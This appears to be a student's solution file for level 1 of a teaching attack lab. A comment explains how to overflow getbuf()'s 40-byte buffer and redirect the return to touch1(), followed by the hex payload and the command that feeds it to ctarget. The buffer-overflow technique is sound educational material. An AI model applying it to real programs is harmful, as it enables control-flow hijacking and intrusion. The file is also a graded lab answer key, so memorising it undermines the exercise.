/* 40 bytes are allocated on the stack by getbuf(). Thus, we need to fill
those 40 bytes and then inject the memory address of function touch1() as
the return address.
We can do like:
0123456789012345678901234567890123456789 + address.

The address of touche1() is: 0x 00 00 00 00 00 40 17 c0.

Due to little endian, we should reverse the ordering:
0x 00 00 00 00 00 40 17 c0       => c0 17 40 00 00 00 00 00
0x 00 01 02 03 04 05 06 07 08 09 => 09 08 07 06 05 04 03 02 01 00

The stack after input:
---------------------------
|00 00 00 00 00 40 17 c0  | return address after calling Gets()
---------------------------
|00 00 00 00 00 00 00 00  |
---------------------------
|00 00 00 00 00 00 00 00  |
---------------------------
|00 00 00 00 00 00 00 00  |
---------------------------
|00 00 00 00 00 00 00 00  |
---------------------------
|00 00 00 00 00 00 00 00  |
---------------------------

./hex2raw < CI_level1/level1.txt | ./ctarget -q
 */

00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
c0 17 40 00 00 00 00 00
